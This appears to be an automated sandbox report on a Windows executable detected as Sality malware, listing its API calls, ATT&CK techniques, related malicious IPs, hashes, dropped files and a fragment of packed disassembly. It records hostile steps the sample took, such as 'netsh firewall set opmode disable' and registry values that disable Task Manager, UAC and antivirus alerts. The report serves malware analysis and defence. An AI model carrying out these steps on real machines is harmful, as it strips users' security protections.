        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe | Code function: 0_2_004053F0 GetVersionExA,ImpersonateSelf,GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,AllocateAndInitializeSid,LocalAlloc,InitializeSecurityDescriptor,GetLengthSid,LocalAlloc,InitializeAcl,AddAccessAllowedAce,SetSecurityDescriptorDacl,SetSecurityDescriptorGroup,SetSecurityDescriptorOwner,IsValidSecurityDescriptor,AccessCheck,RevertToSelf
        Source: dwm.exe, 00000006.00000002.2701382773.0000026DAA594000.00000004.00000020.00020000.00000000.sdmp, dwm.exe, 00000006.00000000.1455385331.0000026DAA594000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager
        Source: dwm.exe, 00000006.00000000.1455875974.0000026DAAB41000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000006.00000002.2702252838.0000026DAAB40000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
        Source: dwm.exe, 00000006.00000000.1455875974.0000026DAAB41000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000006.00000002.2702252838.0000026DAAB40000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
        Source: dwm.exe, 00000006.00000000.1455875974.0000026DAAB41000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000006.00000002.2702252838.0000026DAAB40000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: 0Program Manager
        Source: dwm.exe, 00000006.00000000.1455875974.0000026DAAB41000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000006.00000002.2702252838.0000026DAAB40000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe | Code function: 0_2_00417908 cpuid
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe | Code function: 0_2_00417538 GetLocaleInfoA
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe | Code function: 0_2_0040A0D0 SetupDiSetSelectedDevice,_memset,SetupDiGetDeviceRegistryPropertyA,SetupDiCallClassInstaller,SetupDiRemoveDevice
        Source: C:\Windows\SysWOW64\netsh.exe | Queries volume information: C:\ VolumeInformation
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe | Code function: 0_2_00415046 GetSystemTimeAsFileTime,__aulldiv
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe | Code function: 0_2_00403260 GetModuleHandleA,GetProcAddress,GetCurrentProcess,_sprintf,MessageBoxA,GetWindowsDirectoryA,GetSystemDirectoryA,GetCurrentDirectoryA,_memset,SHGetFolderPathA,SHGetFolderPathA,PathAppendA,SHGetFolderPathA,SHGetSpecialFolderPathA,SHGetSpecialFolderPathA,SHGetSpecialFolderPathA,_getenv,_getenv,SHGetSpecialFolderPathA,GetUserDefaultLangID,SHGetSpecialFolderPathA,_sprintf,SHGetSpecialFolderPathA,_sprintf,GetModuleFileNameA,GetComputerNameA,GetUserNameA,GetVersionExA,_sprintf,_sprintf

        Lowering of HIPS / PFW / Operating System Security Settings

        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center AntiVirusOverride
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe | Registry key or value deleted: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot AlternateShell
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe | Registry value created: DisableTaskMgr 1
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe | Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System EnableLUA
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe | Registry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system DisableRegistryTools
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe | Registry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system DisableTaskMgr
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe | Process created: C:\Windows\SysWOW64\netsh.exe netsh firewall set opmode disable
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe | Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe | Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\Svc
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe | Process created: C:\Windows\SysWOW64\netsh.exe netsh firewall set opmode disable
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe | Process created: C:\Windows\SysWOW64\netsh.exe netsh firewall set opmode disable
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe | Code function: 0_2_022F3846 socket,setsockopt,bind,recvfrom
        MITRE ATT&CK Matrix

        Techniques observed for this sample, grouped by tactic; the number in parentheses is the count shown in the matrix for that technique. No technique was flagged under Reconnaissance, Resource Development, Lateral Movement or Exfiltration.

        Initial Access: Replication Through Removable Media (1)
        Execution: Native API (13), Command and Scripting Interpreter (3), Service Execution (1)
        Persistence: DLL Side-Loading (1), Windows Service (1)
        Privilege Escalation: DLL Side-Loading (1), Bypass User Account Control (1), Access Token Manipulation (1), Windows Service (1), Process Injection (32)
        Defense Evasion: Disable or Modify Tools (10), Deobfuscate/Decode Files or Information (1), Obfuscated Files or Information (3), Software Packing (2), DLL Side-Loading (1), Bypass User Account Control (1), Virtualization/Sandbox Evasion (21), Access Token Manipulation (1), Process Injection (32)
        Credential Access: Credential API Hooking (1)
        Discovery: System Time Discovery (1), Peripheral Device Discovery (1), Account Discovery (1), File and Directory Discovery (3), System Information Discovery (43), Query Registry (1), Security Software Discovery (21), Virtualization/Sandbox Evasion (21), Process Discovery (3), System Owner/User Discovery (1)
        Collection: Archive Collected Data (1), Credential API Hooking (1)
        Command and Control: Ingress Tool Transfer (4), Encrypted Channel (12), Non-Standard Port (1), Non-Application Layer Protocol (3), Application Layer Protocol (4)
        Impact: System Shutdown/Reboot (1), Inhibit System Recovery (1)
        Antivirus detection for the submitted sample (Source | Detection | Scanner | Label)

        LisectAVT_2403002B_38.exe | 100% | Avira | W32/Sality.Y
        LisectAVT_2403002B_38.exe | 100% | Joe Sandbox ML |

        No Antivirus matches
                      Joe Sandbox version:40.0.0 Tourmaline
                      Analysis ID:1481739
                      Start date and time:2024-07-25 13:44:00 +02:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 5m 45s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Number of analysed new started processes analysed:14
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:3
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:LisectAVT_2403002B_38.exe
                      Detection:MAL
                      Classification:mal100.spre.evad.winEXE@4/4@5/14
                      EGA Information:
                      • Successful, ratio: 100%
                      HCA Information:
                      • Successful, ratio: 100%
                      • Number of executed functions: 48
                      • Number of non-executed functions: 113
                      Cookbook Comments:
                      • Found application associated with file extension: .exe
                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, audiodg.exe, RuntimeBroker.exe, ShellExperienceHost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                      • Excluded IPs from analysis (whitelisted): 20.190.159.73, 20.190.159.64, 20.190.159.71, 20.190.159.68, 40.126.31.73, 40.126.31.67, 20.190.159.75, 20.190.159.2
                      • Excluded domains from analysis (whitelisted): prdv4a.aadg.msidentity.com, fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, www.tm.v4.a.prd.aadg.trafficmanager.net, ctldl.windowsupdate.com, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, www.tm.lg.prod.aadmsa.trafficmanager.net
                      • Not all processes where analyzed, report is missing behavior information
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • Report size getting too big, too many NtSetValueKey calls found.
                      • VT rate limit hit for: LisectAVT_2403002B_38.exe
Time | Type | Description
07:45:00 | API Interceptor | 13x Sleep call for process: LisectAVT_2403002B_38.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
94.76.218.18 | KeyPanel.exe | malicious | Sality |
 | pkmo.exe | malicious | Unknown |
No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
CLARO S.A. BR | phish_alert_sp2_2.0.0.0(4).eml | malicious | HTMLPhisher | 2.17.100.210
 | LisectAVT_2403002C_62.dll | malicious | Emotet | 201.75.62.86
 | Lisect_AVT_24003_G1B_122.exe | malicious | Unknown | 200.174.198.86
 | Lisect_AVT_24003_G1B_122.exe | malicious | Unknown | 200.174.198.86
 | 94.156.8.9-skid.sh4-2024-07-23T17_40_06.elf | malicious | Mirai, Moobot | 177.64.217.240
 | wAO7F8FbEz.elf | malicious | Unknown | 189.86.165.235
 | 0GJSC4Ua2K.elf | malicious | Unknown | 177.59.11.94
 | BJu5gH74uD.elf | malicious | Unknown | 200.178.5.212
 | 3B4ehVz4C4.elf | malicious | Mirai | 179.208.175.208
 | PoksxEQkb8.elf | malicious | Unknown | 200.191.29.200
MULTIMEDIA-AS Cable DTV Internet Voice Provider in Poland | 1gx339YsKN.elf | malicious | Mirai, Gafgyt, Okiru | 84.38.82.15
 | l5EsscvvPL.elf | malicious | Mirai | 81.190.245.11
 | ikFn0h3xhF.elf | malicious | Mirai | 85.117.3.203
 | 2T9ShVKj85.elf | malicious | Mirai | 81.190.221.71
 | Xe3eO9R1Ra.elf | malicious | Mirai | 87.116.196.179
 | N5fJpUN6DR.elf | malicious | Mirai | 89.230.211.104
 | GK9sEyIS4f.elf | malicious | Mirai | 87.116.196.124
 | 4VKc1Xzicz.elf | malicious | Mirai | 89.229.254.71
 | jew.mpsl.elf | malicious | Unknown | 37.190.169.138
 | jdsfl.x86.elf | malicious | Mirai | 89.230.211.128
HETZNER-AS DE | LisectAVT_2403002B_48.exe | malicious | Bdaejec, BlackMoon | 88.198.117.174
 | LisectAVT_2403002B_51.exe | malicious | Unknown | 116.203.169.153
 | LisectAVT_2403002B_486.exe | malicious | RedLine | 135.181.235.186
 | LisectAVT_2403002B_51.exe | malicious | Unknown | 116.203.169.153
 | LisectAVT_2403002B_55.exe | malicious | Xmrig | 5.75.158.61
 | LisectAVT_2403002B_59.dll | malicious | Emotet | 78.47.204.80
 | LisectAVT_2403002C_119.exe | malicious | Bdaejec, Sodinokibi | 159.69.118.212
 | Bootstrapper.exe | malicious | Hancitor, Vidar | 95.217.240.177
 | LisectAVT_2403002C_47.exe | malicious | SmokeLoader | 188.40.141.211
 | LisectAVT_2403002C_60.exe | malicious | PureLog Stealer, Vidar | 128.140.125.116
AS-AZTELEKOM Azerbaijan Telecomunication ISP AZ | t4wCexrzVN.dll | malicious | Wannacry | 212.47.134.196
 | miraint.sh4 | malicious | Mirai | 158.181.37.74
 | Dsiuf7Hoq9 | malicious | Mirai | 80.69.53.205
Match | Associated Sample Name / URL | Detection | Threat Name | Context
37f463bf4616ecd445d4a1937da06e19 | Setup#U540d#U5f55.exe | malicious | Unknown | 195.201.126.132
 | LisectAVT_2403002B_401.exe | malicious | CryptOne | 195.201.126.132
 | LisectAVT_2403002B_429.exe | malicious | Bdaejec | 195.201.126.132
 | LisectAVT_2403002B_429.exe | malicious | Bdaejec | 195.201.126.132
 | LisectAVT_2403002B_437.exe | malicious | CryptOne | 195.201.126.132
 | LisectAVT_2403002B_463.exe | malicious | Bdaejec | 195.201.126.132
 | LisectAVT_2403002B_458.exe | malicious | Unknown | 195.201.126.132
 | LisectAVT_2403002B_463.exe | malicious | Bdaejec | 195.201.126.132
 | LisectAVT_2403002B_480.exe | malicious | CobaltStrike, Metasploit | 195.201.126.132
 | LisectAVT_2403002B_78.exe | malicious | Unknown | 195.201.126.132
Match | Associated Sample Name / URL | Detection | Threat Name | Context
C:\Users\user\AppData\Local\Temp\ipyr.exe | m7q7gcniEz.exe | malicious | Unknown |
                            Process:C:\Users\user\Desktop\LisectAVT_2403002B_38.exe
                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):165888
                            Entropy (8bit):6.6980821797813785
                            Encrypted:false
                            SSDEEP:3072:GLLvkpY5SnMwbv5RkorwMLuflibzL/cNArhCAEf7ngKpIcXNokJrzOxEPcZA8TJa:E6USNVRkIHXO7RN/1y6PcOwej/Hv
                            MD5:E92D3A824A0578A50D2DD81B5060145F
                            SHA1:50EF7C645FD5CBB95D50FBADDF6213800F9296EC
                            SHA-256:87F53BC444C05230CE439DBB127C03F2E374067D6FB08E91C834371FD9ECF661
                            SHA-512:40D0AC6FA5A424B099923FCDB465E9A2F44569AF1C75CF05323315A8720517316A7E8627BE248CFF3A83382FB6DB1CF026161F627A39BC1908E63F67A34C0FD5
                            Malicious:false
                            Joe Sandbox View:
                            • Filename: m7q7gcniEz.exe, Detection: malicious, Browse
                            Reputation:low
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......zt..>..>..>..7m|....*~.2..*~.;..*~.7..>..i..*~.#..*~....*~..?..*~..?..*~.?..Rich>..........................PE..L....$...................$...v......`........@....@.................................4.....@.................................|d..................................($...O..T...........................`................`..x...H........................text....#.......$.................. ..`.data...t....@.......(..............@....idata..N!...`..."...2..............@..@.didat...............T..............@....rsrc................V..............@..@.reloc..($.......&...b..............@..B................................................................................................................................................................................................................................................................
                            Process:C:\Users\user\Desktop\LisectAVT_2403002B_38.exe
                            File Type:data
                            Category:modified
                            Size (bytes):7274
                            Entropy (8bit):7.971631014666999
                            Encrypted:false
                            SSDEEP:192:GdYdRxL4HxJCbosHPgRpB0G75LJG1DtnymZv:GdDH+ELpBNw3ymZv
                            MD5:E07D7D3EA3ED643F30CFAA2B1F27F792
                            SHA1:763ADAE7507D5D696D5877509C8C0CEA9F250720
                            SHA-256:867E4891F2E6F55E75D5A621D5A50C10F8AC802FCC3834CCA3F9EE701DA7E0C1
                            SHA-512:F63A1DE8895CD6B64A4DCE4E16BE58DE9D07265871EFF176197A25BD7313BDD6AA7AD1C88AFAD932C9E961089B96DA38C70B9CC30EF0EA614F0E6D15E9A492B4
                            Malicious:false
                            Reputation:low
                            Preview:.M.4..{.}.!.y.....V..V.tdL }.....v..0...p..Uq1>.E$W1.....Z+...C..UW2!).."'.%.F...q..D.$.SiB..-.j.2'..q....g..,..L%..~..h#...hs..F.A.....z..Z.8? .i..~.M..0../...D.".a.U.>...A..U6..wde1..>.,.H#............_.eet.Z.....`...4.A.:.{...H...b...#s..{....W<H...'...d..b/.CS...mIw......M.=..=..i...h(...R..45W.,..A..L...).|J.....k4.j..{)1....T.{h.......^MNb..Fr...v..n..xrV......z-9.D}....>..$.s...U......rD...K.W...{P.k.....M..A..9..>_.M-...Bl..a-C..Y......H.1r.Z>p....L.E.). ....4.,.~.4.SF\D..n...............).....XW.z.q...>.....Jh.`+...:...W)g..E.`...p.H.b{..=@....jzm..C..T.xV(..d?d.Y.#$.....K.S..o....9!... .vYioJ.,....r.O..,....K...i9...... )\.T.....S..V..Q.~......U..e...;P....DyL...j..d...z......{q=.._.......2.T..1.^...@ywO..`.y..M..g4...I.s..u......R...%3..d..>=...(.:.p....8.^..1....9.z&.hG..t0.....o..L.mH0..[..F.."..Ri.-...Cw.[Y......k`;?.E..2w.u.sm...5...[.B.'...k.....g.)..e..'..QRIb.f.VP.H_!..qz<H.$...z.sP.4....5E|.p.s...)....h..i ............c.+.b.pY
                            Process:C:\Users\user\Desktop\LisectAVT_2403002B_38.exe
                            File Type:Windows SYSTEM.INI
                            Category:dropped
                            Size (bytes):255
                            Entropy (8bit):5.27326679734616
                            Encrypted:false
                            SSDEEP:6:aQ44VvYkDyyp3BYf1fyBcfjfKvcie0xTqFtP1yL:F4Yv7yk3OUBq82wqFtP1yL
                            MD5:A7AF9B0AFC81CEA829CCEF0A25ACC619
                            SHA1:39BDBDEC485CBAB40E4A24C641AC5350C2555147
                            SHA-256:2F899673F34C2B0640CAB1E22FBA1B73DE6E3C8FFC5204431660D7CA29FC0364
                            SHA-512:22B5156AA75692BD870E3A2A202A1925A007CB9523B916DECCE392269395C498CC04C5919BBC9AFDA4508294CD328065AB6C4EE8D5F488C5055DA0CD7634689D
                            Malicious:false
                            Reputation:low
                            Preview:; for 16-bit app support..[386Enh]..woafont=dosapp.fon..EGA80WOA.FON=EGA80WOA.FON..EGA40WOA.FON=EGA40WOA.FON..CGA80WOA.FON=CGA80WOA.FON..CGA40WOA.FON=CGA40WOA.FON....[drivers]..wave=mmdrv.dll..timer=timer.drv....[mci]..[MCIDRV_VER]..DEVICEMB=66797654685..
                            Process:C:\Windows\SysWOW64\netsh.exe
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):313
                            Entropy (8bit):4.971939296804078
                            Encrypted:false
                            SSDEEP:6:/ojfKsUTGN8Ypox42k9L+DbGMKeQE+vigqAZs2E+AYeDPO+Yswyha:wjPIGNrkHk9iaeIM6ADDPOHyha
                            MD5:689E2126A85BF55121488295EE068FA1
                            SHA1:09BAAA253A49D80C18326DFBCA106551EBF22DD6
                            SHA-256:D968A966EF474068E41256321F77807A042F1965744633D37A203A705662EC25
                            SHA-512:C3736A8FC7E6573FA1B26FE6A901C05EE85C55A4A276F8F569D9EADC9A58BEC507D1BB90DBF9EA62AE79A6783178C69304187D6B90441D82E46F5F56172B5C5C
                            Malicious:false
                            Reputation:high, very likely benign file
                            Preview:..IMPORTANT: Command executed successfully...However, "netsh firewall" is deprecated;..use "netsh advfirewall firewall" instead...For more information on using "netsh advfirewall firewall" commands..instead of "netsh firewall", see KB article 947709..at https://go.microsoft.com/fwlink/?linkid=121488 .....Ok.....
                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Entropy (8bit):6.647042202071686
                            TrID:
                            • Win32 Executable (generic) a (10002005/4) 99.53%
                            • InstallShield setup (43055/19) 0.43%
                            • Generic Win/DOS Executable (2004/3) 0.02%
                            • DOS Executable Generic (2002/1) 0.02%
                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                            File name:LisectAVT_2403002B_38.exe
                            File size:563'744 bytes
                            MD5:dcd409fa904f30ab580781337fb866b7
                            SHA1:e377b6810bb20b46ec0ce24020a58dfec7f94b18
                            SHA256:2cca553e01de4f4ba2f5eaa1b0b1bc8bfbaee289d7b95dbdb3d6e0d67cd9c7fd
                            SHA512:000686649dc4b9ff86ec29213b09cd28ce405fd28d1886110166d1b82aa1e2f760c9acb3fbc10dd793d986151cb4a75f222fe4bf7e4d83302087e414aa23416a
                            SSDEEP:6144:aQbQA4BEMTpzHq1KZe75Q3QbpkcuxgrLQxPS5LjYQuuXVCCk/j+lTsAJmfDe+Bui:HQDFKFAe7YYsFV4qR
                            TLSH:B8C43B70F6EAC9A6F1F3BB30A9745A6409B3BEE6AF74804F364C748D4A717809434752
                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........7Q..dQ..dQ..dvX.dD..d.Z.dP..dvX.d,..d...dR..d...dD..dQ..d...dvX.dj..dvX.dP..dvX.dP..dRichQ..d........................PE..L..
                            Icon Hash:0e071313c6baf817
                            Entrypoint:0x40e2c8
                            Entrypoint Section:.text
                            Digitally signed:true
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                            DLL Characteristics:
                            Time Stamp:0x4A8DA167 [Thu Aug 20 19:17:59 2009 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:4
                            OS Version Minor:0
                            File Version Major:4
                            File Version Minor:0
                            Subsystem Version Major:4
                            Subsystem Version Minor:0
                            Import Hash:00820213dca84d93f40ffdf514a6b4dc
                            Signature Valid:
                            Signature Issuer:
                            Signature Validation Error:
                            Error Number:
                            Not Before, Not After
                              Subject Chain
                                Version:
                                Thumbprint MD5:
                                Thumbprint SHA-1:
                                Thumbprint SHA-256:
                                Serial:
                                Instruction
                                pushad
                                push 00000056h
                                call 00007F6348E5753Eh
                                pop ecx
                                sub edx, 000020B6h
                                xor ebx, ecx
                                mov ecx, 990EE7F4h
                                mov al, dh
                                rcl esi, FFFFFFE5h
                                jmp 00007F6348E572F3h
                                mov ch, 68h
                                sub al, BFh
                                jbe 00007F6348E572F6h
                                push 00000042h
                                call 00007F6348E57586h
                                pop ecx
                                pop ebx
                                call 00007F6348E5731Dh
                                xchg eax, edx
                                adc esi, edx
                                pusha
                                lodsb
                                mov al, byte ptr [2FD1D588h]
                                js 00007F6348E5734Bh
                                or dword ptr [esi-7Dh], 42CC894Ah
                                leave
                                jmp 00007F62D549B68Ah
                                mov bh, 8Dh
                                lodsb
                                out 63h, eax
                                and ebp, dword ptr [ebx-64h]
                                add eax, A416345Eh
                                push 0000000Ch
                                call 00007F6348E5793Dh
                                pop ecx
                                push 00000074h
                                push FFFFFFF1h
                                and eax, 00000000h
                                push eax
                                call dword ptr [0041B158h]
                                pop edx
                                pop edx
                                sub ebp, esi
                                rcl esi, 1
                                shrd ebp, edi, cl
                                push 029A9A2Fh
                                push 1B86F03Ah
                                call 00007F6348E57528h
                                pop ebx
                                pop eax
                                pop edx
                                cmp eax, esi
                                shld ebx, edx, cl
                                not ebx
                                movzx ebx, cx
                                movzx ebx, cx
                                jne 00007F6348E572FEh
                                sub eax, ebx
                                bsf ebx, edx
                                shld ebx, edx, 00000080h
                                xor ebx, ecx
                                add edx, 023B5F96h
                                cmp al, dh
                                rcl ecx, 1
                                adc ecx, ebp
                                rcl ecx, 5Ch
                                sub edx, 0234928Fh
                                test ebx, 71C6FFECh
                                test ch, dl
                                imul edi, esi, 00009F0Ch
                                Programming Language:
                                • [ASM] VS2005 build 50727
                                • [ C ] VS2005 build 50727
                                • [C++] VS2005 build 50727
                                • [RES] VS2005 build 50727
                                • [LNK] VS2005 build 50727
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x2376c | 0xdc | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x2d000 | 0x4dabc | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x75000 | 0x1a20 | .rsrc
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x22e60 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x1b000 | 0x3a4 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x19f29 | 0x1a000 | b4659923aa4571b286be3e5bef658877 | False | 0.590576171875 | data | 6.602995608020341 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata | 0x1b000 | 0x9ce4 | 0xa000 | 9c7180d927b32939ed8e3064f9b5660a | False | 0.3497314453125 | data | 5.508291628702278 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.data | 0x25000 | 0x79a8 | 0x2000 | 98b7e1246bc229baafca12b1925d036e | False | 0.1470947265625 | data | 2.290726643091353 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x2d000 | 0x4dabc | 0x4e000 | 581c313968042a18aa2db4fc8b053636 | False | 0.24480418669871795 | data | 5.8282045153546065 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.ardata | 0x7b000 | 0x13000 | 0x13000 | a0e8a7e8dc948977a8e4b61ef4c4dee8 | False | 0.9961708470394737 | data | 7.994014875588453 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_BITMAP | 0x2df10 | 0x2b266 | Device independent bitmap graphic, 488 x 360 x 8, image size 175682, resolution 2834 x 2834 px/m, 255 important colors | Arabic | Saudi Arabia | 0.23287051181948829
RT_ICON | 0x59178 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 1152 | English | United States | 0.42865853658536585
RT_ICON | 0x597e0 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | English | United States | 0.5120967741935484
RT_ICON | 0x59ac8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | English | United States | 0.597972972972973
RT_ICON | 0x59bf0 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | English | United States | 0.517590618336887
RT_ICON | 0x5aa98 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | United States | 0.6773465703971119
RT_ICON | 0x5b340 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | English | United States | 0.4725433526011561
RT_ICON | 0x5b8a8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.2846473029045643
RT_ICON | 0x5de50 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.45872420262664165
RT_ICON | 0x5eef8 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.6046099290780141
RT_ICON | 0x5f360 | 0xca8 | Device independent bitmap graphic, 32 x 64 x 24, image size 3072 | English | United States | 0.6493827160493827
RT_ICON | 0x60008 | 0xca8 | Device independent bitmap graphic, 32 x 64 x 24, image size 3072 | English | United States | 0.17530864197530865
RT_DIALOG | 0x60cb0 | 0x316 | data | Arabic | Saudi Arabia | 0.46582278481012657
RT_DIALOG | 0x60fc8 | 0x25c | data | Chinese | Taiwan | 0.5480132450331126
RT_DIALOG | 0x61224 | 0x394 | data | Czech | Czech Republic | 0.43231441048034935
RT_DIALOG | 0x615b8 | 0x328 | data | Danish | Denmark | 0.44183168316831684
RT_DIALOG | 0x618e0 | 0x39a | data | German | Germany | 0.4078091106290672
RT_DIALOG | 0x61c7c | 0x3ce | data | Greek | Greece | 0.4548254620123203
RT_DIALOG | 0x6204c | 0x33c | data | English | United States | 0.4335748792270531
RT_DIALOG | 0x62388 | 0x38a | data | Finnish | Finland | 0.4227373068432671
RT_DIALOG | 0x62714 | 0x3ca | data | French | France | 0.41237113402061853
RT_DIALOG | 0x62ae0 | 0x36a | data | Hebrew | Israel | 0.45308924485125857
RT_DIALOG | 0x62e4c | 0x426 | data | Hungarian | Hungary | 0.4011299435028249
RT_DIALOG | 0x63274 | 0x352 | data | Italian | Italy | 0.4294117647058823
RT_DIALOG | 0x635c8 | 0x2c2 | data | Japanese | Japan | 0.5453257790368272
RT_DIALOG | 0x6388c | 0x288 | data | Korean | North Korea | 0.5709876543209876
RT_DIALOG | 0x6388c | 0x288 | data | Korean | South Korea | 0.5709876543209876
RT_DIALOG | 0x63b14 | 0x3b2 | data | Dutch | Netherlands | 0.4069767441860465
RT_DIALOG | 0x63ec8 | 0x344 | data | Norwegian | Norway | 0.44019138755980863
RT_DIALOG | 0x6420c | 0x338 | data | Polish | Poland | 0.44902912621359226
RT_DIALOG | 0x64544 | 0x35c | data | Portuguese | Brazil | 0.4290697674418605
RT_DIALOG | 0x648a0 | 0x358 | data | Russian | Russia | 0.44742990654205606
RT_DIALOG | 0x64bf8 | 0x380 | data | Slovak | Slovakia | 0.4263392857142857
RT_DIALOG | 0x64f78 | 0x36c | data | Swedish | Sweden | 0.4440639269406393
RT_DIALOG | 0x652e4 | 0x384 | data | Thai | Thailand | 0.4577777777777778
RT_DIALOG | 0x65668 | 0x3ae | data | Turkish | Turkey | 0.42250530785562634
RT_DIALOG | 0x65a18 | 0x37c | data | Slovenian | Slovenia | 0.4304932735426009
RT_DIALOG | 0x65d94 | 0x24c | data | Chinese | China | 0.5561224489795918
RT_DIALOG | 0x65fe0 | 0x3b0 | data | Spanish | Mexico | 0.4004237288135593
RT_DIALOG | 0x66390 | 0x3a0 | data | Portuguese | Portugal | 0.4051724137931034
RT_DIALOG | 0x66730 | 0x3c8 | data | | | 0.38739669421487605
